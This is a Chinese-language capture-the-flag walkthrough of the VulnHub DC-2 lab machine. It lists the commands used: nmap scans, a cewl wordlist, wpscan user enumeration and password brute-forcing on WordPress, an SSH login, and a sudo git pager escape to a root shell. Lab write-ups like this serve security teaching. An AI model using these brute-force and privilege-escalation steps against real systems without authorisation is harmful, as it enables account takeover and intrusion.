DC-2
作者:互联网
环境搭建
下载地址:
https://download.vulnhub.com/dc/DC-2.zip.torrent
从描述中得知有5个flag。
下载好后导入虚拟机
修改网络配置为NAT
探测靶机
nmap扫描一波
nmap -sP 192.168.164.0/24
确认靶机IP为192.168.164.179
提示要修改host文件
成功访问
使用nmap扫描开放的端口
nmap -A -sS -sV -v -p- 192.168.164.179
开启了80和7744端口
挖掘信息
该网站有一个flag界面,点开查看提示
第一可能需要用cewl爬虫收集网站信息,第二这是一个wordpress网站。
根据flag1的提示使用命令:
cewl http://dc-2/ -w 1.txt
爆破登录端口
由于知道这是一个wordpress的cms搭建的网站,使用wpscan扫描一波,枚举一下用户名
wpscan --url http://dc-2/ -eu
得到3个用户名
将获得的用户名保存到2.txt文件中
开始用wpscan启动爆破功能最后跑出几个账号出来
wpscan -–url http://dc-2/ -U 2.txt -P 1.txt
获得两个用户名的密码
登录后台
使用jerry登录后发现flag2
登录SSH端口
尝试用得到的账号连接ssh
jerry连接失败
tom连接成功
权限太少,无论输入啥都是-rbash:
成功解决此问题
ls查看当前目录,存在flag3.txt,直接读取
返回/home目录下进入jerry目录下,发现flag4.txt,直接读取
提权
tom无权限
切换成jerry可以找点东西
可以以root权限运行/usr/bin/git文件
sudo git help config
!/bin/bash或者!'sh'完成提权
sudo git -p help
!/bin/bash
到root目录下获得最终flag
标签:用户名,nmap,jerry,dc,DC,wpscan,txt 来源: https://www.cnblogs.com/zhaohzaomumu/p/15322277.html